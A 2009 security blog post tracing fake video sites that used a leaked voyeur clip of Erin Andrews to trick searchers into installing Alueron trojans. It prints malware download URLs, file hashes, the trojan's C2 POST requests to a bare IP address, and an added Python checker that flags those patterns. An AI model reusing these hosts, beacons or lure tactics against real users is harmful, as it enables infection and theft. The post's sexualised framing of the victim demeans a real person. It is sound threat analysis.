Tuesday, July 21, 2009

Erin Andrews Peepshow Gone Bad?

Fox News and other media outlets are reporting that ESPN sportscaster hottie Erin Andrews was the victim of a severe invasion of privacy. Per Fox News, "Sexy ESPN sportscaster Erin Andrews was the target of a peephole pervert who surreptitiously shot a video of her walking around her hotel room naked -- and posted it on the Internet."

So what happens next? Tons of people search for the video before it is pulled by authorities, and cyber criminals race to put up rogue exploit sites tied to the common search terms. As an example, the Google search for "Erin Andrews video nude" returns a hit for http://digg.com/celebrity/Naked_Erin_Andrews_SEX_TAPE_online_free.

The comments on the digg.com link contained hyperlinks to the following sites (note: the linked sites change frequently):

http://video.report-cnn.com/Erin_Andrews_Peephole_Video (7/20/09)
http://sexy-top-news.com/show.php?id=Erin_Andrews (7/21/09)
http://vsj-news.com/video.php?vid=erin_andrews_peephole_video (7/21/09)

So let's follow the links to see the video :)

video.report-cnn.com (72.232.116.51)

Wow, CNN Video has the video!

All I need to do is download this Live Video Player!

MediaPlayer.exe seems legitimate.

No movie :( - what happened???

The file MediaPlayer.exe was downloaded from simplexdoom.com (91.214.45.73).

GET: http://simplexdoom.com/download/395a695151773d3df7992c7620090715/MediaPlayer.exe
Referer: http://mediaplayer.4upd.com/Products/update_seven_win/-6478-332-34-en-hq-/mediatube.swf?clip=Erin Andrews Peephole Video

File: MediaPlayer.exe
Size: 86715
MD5: 9D05428AE376A369798B126358B74150

Per ThreatExpert, MediaPlayer.exe installs several Alueron malware components. Per CA, "Alueron is a family of trojans with a variety of components that can download and execute arbitrary files, hijack the browser to display fake web pages, and report affected users' queries performed with popular search engines."

During analysis, the Alueron malware made the following C2 connections.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Let's try again, it has to be out there.

vsj-news.com (174.36.240.140)

VSJ News has to have the video. All I need is a Flash video codec plugin!

FlashCodecPlugin.exe looks good!

No movie again :(

The file FlashCodecPlugin.exe was downloaded from bigdron.com (91.214.45.73).

GET http://bigdron.com/download/6936413148673d3d4ae1782e20090701/FlashCodecPlugin.exe
Referer: http://vsj-news.com/video.php?vid=erin_andrews_peephole_video

File: FlashCodecPlugin.exe
Size: 88514
MD5: 87CFCC91FB9934E55D3C969997D2BDC1

Per ThreatExpert, FlashCodecPlugin.exe also installs several Alueron malware components.

The FlashCodecPlugin.exe Alueron malware also connects to the same C2 sites.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73
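As an added example (not code from the original post), here is a small Python checker that applies the two patterns captured above to proxy log blocks: an executable named like the fake codecs (MediaPlayer.exe, FlashCodecPlugin.exe) fetched from a host other than the referring page, and a POST to /generator.php or /adc.php with a bare-IP Host header. The sample log is constructed from the requests shown in the post, and the file-name pattern is an assumption.

```python
import re
from urllib.parse import urlparse

# Indicators drawn from the captured traffic in the post: the two POST paths the
# Alueron sample beaconed to at a bare IP, and the fake-codec file names (assumed
# pattern; extend it as other lure names are observed).
C2_PATHS = {"/generator.php", "/adc.php"}
FAKE_CODEC = re.compile(r"/(MediaPlayer|FlashCodecPlugin)\.exe$", re.I)
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Constructed sample log, modelled on the requests shown in the post.
SAMPLE_LOG = """\
GET: http://simplexdoom.com/download/395a695151773d3df7992c7620090715/MediaPlayer.exe
Referer: http://mediaplayer.4upd.com/Products/update_seven_win/-6478-332-34-en-hq-/mediatube.swf?clip=Erin Andrews Peephole Video

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

GET http://example.com/index.html
Referer: http://example.com/
"""

def parse_blocks(log):
    """Split a proxy log into request blocks of (method, target, headers)."""
    for block in re.split(r"\n\s*\n", log.strip()):
        first, *rest = block.splitlines()
        method, target = first.replace("GET:", "GET").split()[:2]
        headers = dict(h.split(": ", 1) for h in rest if ": " in h)
        yield method, target, headers

def classify(method, target, headers):
    """Label one request: fake-codec download, Alueron-style C2 beacon, or benign."""
    if method == "GET" and FAKE_CODEC.search(urlparse(target).path):
        dl_host = urlparse(target).hostname
        ref_host = urlparse(headers.get("Referer", "")).hostname
        # The .exe is served by a host unrelated to the page that linked to it.
        if ref_host and dl_host != ref_host:
            return "fake_codec_download"
    if method == "POST" and target in C2_PATHS and IPV4.match(headers.get("Host", "")):
        # Beacon to a bare-IP Host on the paths seen during analysis.
        return "alueron_c2"
    return "benign"

def scan(log):
    """Return one verdict per request block in the log."""
    return [classify(*b) for b in parse_blocks(log)]
```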

Well, so much for the video. Let's examine some of the domains and IP addresses associated with the Alueron malware.

Domain/IP Analysis

report-cnn.com [hosts fake video requiring codec] currently resolves to 72.232.116.51 (AS22576, Layered Technologies, US). Several other suspect domains (casino, adult and fake-news sites, including mediaplayer.4upd.com) currently resolve to 72.232.116.51.

simplexdoom.com [fake codec malware download site] currently resolves to 91.214.45.73 (AS44042, eSolutions, Belize). Several other suspect domains, including bigdron.com, together with their ns1/ns2 name servers, currently resolve to 91.214.45.73.

vsj-news.com [hosts fake video requiring codec] currently resolves to 174.36.240.140 (AS36351, SOFTLAYER Technologies Inc., US). Several other suspect domains currently resolve to 174.36.240.140.

sexy-top-news.com [listed at digg.com, but down at the time of analysis] currently resolves to 195.88.191.21 (AS22576, Bigness Group Ltd., Russia). Several other suspect domains currently resolve to 195.88.191.21:

empire-of-tops.com
sexy-top-news.com
shocking-stars.net
video-trailers.net

Bottom line: social engineering tactics built around current events and pornographic material remain a preferred TTP for cyber criminals. There is no need to come up with exploit code when users continue to "choose" to install malware themselves.
